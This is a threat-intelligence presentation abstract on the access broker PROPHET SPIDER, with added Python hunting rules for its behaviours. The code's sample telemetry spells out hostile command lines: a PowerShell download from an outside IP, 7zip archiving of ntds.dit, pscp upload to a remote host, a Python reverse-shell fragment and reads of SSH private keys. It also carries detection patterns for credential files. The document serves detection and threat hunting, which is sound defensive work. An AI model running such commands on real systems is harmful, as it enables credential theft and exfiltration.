Hunting Prolific Access Broker PROPHET SPIDER
PROPHET SPIDER is an access broker that has conducted low-volume, opportunistic web server compromises since at least May 2017. The adversary primarily gains access to victims by compromising vulnerable web servers, leveraging a range of vulnerabilities for this purpose. This presentation will discuss PROPHET SPIDER’s distinctive tactics, techniques, and procedures (TTPs), detail the adversary’s custom malware, and provide tips for detection and threat hunting.
PROPHET SPIDER exploits known vulnerabilities in Internet-facing servers, including Citrix, Ivanti CSA, JBoss, and particularly Oracle WebLogic. On Windows, the adversary uses PowerShell to download a wget binary for ingress tool transfer, while on Linux it typically runs Python or Perl reverse shells. PROPHET SPIDER often deploys both JSP or ASP.NET webshells and executable backdoors to enable persistence. In some cases, the adversary has attempted to compile tools using GCC.
PROPHET SPIDER focuses primarily on capturing legitimate credentials. On Windows, the adversary uses a variety of OS credential dumping techniques and regularly tries to capture NTDS.DIT. On Linux, the adversary searches for private keys using cat and grep. To move laterally, PROPHET SPIDER uses low-prevalence binaries to scan internal IP ranges while trying to authenticate with stolen credentials over RDP or SSH. PROPHET SPIDER usually compresses credential-related files into 7zip archives and exfiltrates these archives using PSCP or FTP. In multiple cases, PROPHET SPIDER intrusions have led to ransomware deployment (including Egregor and MountLocker) or to data extortion actors demanding payment in exchange for deleting stolen files, indicating the adversary is likely an access broker.
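As an added illustration, not part of this presentation and not the adversary's or any vendor's code, the Python below turns the behaviours described in the two paragraphs above (a web server process spawning a shell, PowerShell fetching a wget binary, Python or Perl reverse shells, cat/grep searches for private keys, 7zip archiving of NTDS.DIT, and PSCP/FTP transfer of the archive) into hunting logic over process-creation telemetry. The event schema, the sample events, the hostnames and the IP address are all constructed for this example and are not PROPHET SPIDER indicators; the talk's actual directory names, filenames and URL patterns are not reproduced here.

```python
"""Hunt for the PROPHET SPIDER behaviours named in the abstract.

Added example: the event fields and sample telemetry below are assumptions
constructed for illustration, not real indicators from any intrusion.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    os: str        # "windows" or "linux"
    parent: str    # parent process image name
    image: str     # process image name
    cmdline: str   # full command line


# Processes that host JSP (java/tomcat) or ASP.NET (w3wp.exe) webshells.
WEB_PARENTS = {"w3wp.exe", "java", "tomcat", "httpd"}
SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash"}

CRED_FILES = re.compile(r"ntds\.dit|\\sam\b|\\security\b", re.IGNORECASE)
PRIVATE_KEY = re.compile(r"id_rsa|id_ed25519|PRIVATE KEY|\.ssh/", re.IGNORECASE)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.IGNORECASE)
SCRIPT_SOCKET = re.compile(r"\b(python\d?|perl)\b.*\bsocket\b", re.IGNORECASE)
ARCHIVE_ARG = re.compile(r"\S+\.(7z|zip|rar)\b", re.IGNORECASE)

# Constructed sample telemetry (assumed format; 203.0.113.10 is a documentation address).
SAMPLE_EVENTS = [
    ProcEvent("web01", "windows", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("web01", "windows", "cmd.exe", "powershell.exe",
              'powershell -c (New-Object Net.WebClient).DownloadFile('
              '"http://203.0.113.10/wget.exe","C:\\Windows\\Temp\\wget.exe")'),
    ProcEvent("dc01", "windows", "cmd.exe", "7z.exe",
              "7z.exe a C:\\Windows\\Temp\\out.7z C:\\Windows\\NTDS\\ntds.dit"),
    ProcEvent("dc01", "windows", "cmd.exe", "pscp.exe",
              "pscp.exe -pw REDACTED C:\\Windows\\Temp\\out.7z user@203.0.113.10:/tmp/"),
    ProcEvent("app02", "linux", "java", "sh", "sh -c \"python -c 'import socket,os,pty'\""),
    ProcEvent("app02", "linux", "bash", "grep", 'grep -r "BEGIN RSA PRIVATE KEY" /home'),
    ProcEvent("app02", "linux", "bash", "cat", "cat /root/.ssh/id_rsa"),
    # Benign archiving on a workstation: should produce no finding.
    ProcEvent("ws05", "windows", "explorer.exe", "7z.exe", "7z.exe a photos.7z D:\\Pictures"),
]


def rules_for(ev: ProcEvent) -> list[str]:
    """Return the names of every hunting rule the event matches, in fixed order."""
    hits = []
    img = ev.image.lower()
    cmd = ev.cmdline
    # Webshell activity: a web server worker spawning an interactive shell.
    if ev.parent.lower() in WEB_PARENTS and img in SHELLS:
        hits.append("web_process_spawned_shell")
    # Ingress tool transfer: PowerShell downloading a wget binary.
    if img == "powershell.exe" and DOWNLOAD.search(cmd) and re.search(r"wget", cmd, re.I):
        hits.append("powershell_fetches_wget")
    # Credential staging: 7zip archiving NTDS.DIT or registry hives.
    if img in {"7z.exe", "7za.exe", "7z"} and CRED_FILES.search(cmd):
        hits.append("credential_file_archived")
    # Exfiltration: PSCP or FTP moving an archive.
    if img in {"pscp.exe", "pscp", "ftp.exe", "ftp"} and ARCHIVE_ARG.search(cmd):
        hits.append("archive_transferred_out")
    # Linux credential access: cat/grep looking for private keys.
    if ev.os == "linux" and img in {"cat", "grep"} and PRIVATE_KEY.search(cmd):
        hits.append("private_key_search")
    # Linux reverse shell: Python or Perl one-liner opening a socket.
    if ev.os == "linux" and SCRIPT_SOCKET.search(cmd):
        hits.append("scripted_reverse_shell")
    return hits


def hunt(events: list[ProcEvent]) -> list[dict]:
    """Run every rule over every event and collect findings for triage."""
    findings = []
    for ev in events:
        for rule in rules_for(ev):
            findings.append({"host": ev.host, "rule": rule, "cmdline": ev.cmdline})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']:6} {f['rule']:26} {f['cmdline']}")
```

Each rule stands alone, but the findings are most useful when correlated per host in sequence: web server spawning a shell, then tool download, then archiving, then transfer is the full chain the abstract describes, and a single host showing several stages in a short window deserves priority over any one hit.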
PROPHET SPIDER’s malware has slowly matured, and the adversary has recently shifted from Go to C++. PROPHET SPIDER’s custom tools are typically run by creating a new service. Several Remote Access Trojans (RATs) and proxy tools give PROPHET SPIDER flexible capabilities to execute arbitrary commands and exfiltrate data from victim networks.
PROPHET SPIDER has steadily attempted to improve the obfuscation of its code and C2 communications, implementing custom binary protocols and cryptographic procedures in its tools.
Fortunately, PROPHET SPIDER is a creature of habit. This presentation will conclude with consistent directory names, filenames, command-line artifacts, URL patterns, and other behaviors that threat hunters and intelligence analysts can use to uncover PROPHET SPIDER intrusions.